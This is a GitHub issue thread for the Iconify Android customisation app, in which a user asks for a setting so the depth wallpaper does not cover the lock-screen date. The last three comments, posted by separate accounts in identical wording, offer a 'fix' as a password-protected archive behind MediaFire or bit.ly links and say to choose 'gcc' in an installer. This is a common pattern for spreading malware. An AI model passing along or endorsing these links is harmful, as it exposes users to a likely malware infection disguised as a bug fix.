### ISSUE TITLE
[FEATURE] The lock screen deep wallpaper does not cover the date.

### ISSUE THREAD

**Issue by Ziyuan-Sun** [Mahmud0808/Iconify#583]
### Describe the feature

Provide a button which allows users to decide if they want the deep wallpaper to cover the date.

### Why would it be useful to add?

Deep wallpaper may cover the date in some clock styles. Date is not as big as clock, so if it is covered, we cannot see it.

### Example(s)

![Screenshot_2024-08-27-20-56-29-41](https://github.com/user-attachments/assets/ed3b035f-6b00-43ba-9dd6-f54f7c21d5ea)
![Screenshot_2024-08-27-20-56-24-37_b10a9e538c2ad0c5c866dd015b3a149f](https://github.com/user-attachments/assets/c4a4e695-fc31-402e-823c-8362ffa6084e)

**Comment by Ziyuan-Sun** [comment]
Sorry, it's **Depth Wallpaper**. I used a translator.

**Comment by DHD2280** [comment]
Well, this is the exactly behaviour of depth wallpaper. If you don't want to cover clock disable depth wallpaper.

**Comment by Ziyuan-Sun** [comment]
> Well, this is the exactly behaviour of depth wallpaper. If you don't want to cover clock disable depth wallpaper.

But I want it to cover the time only. Perhaps there is a better way , such as providing a style that allows the date to be above time.

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
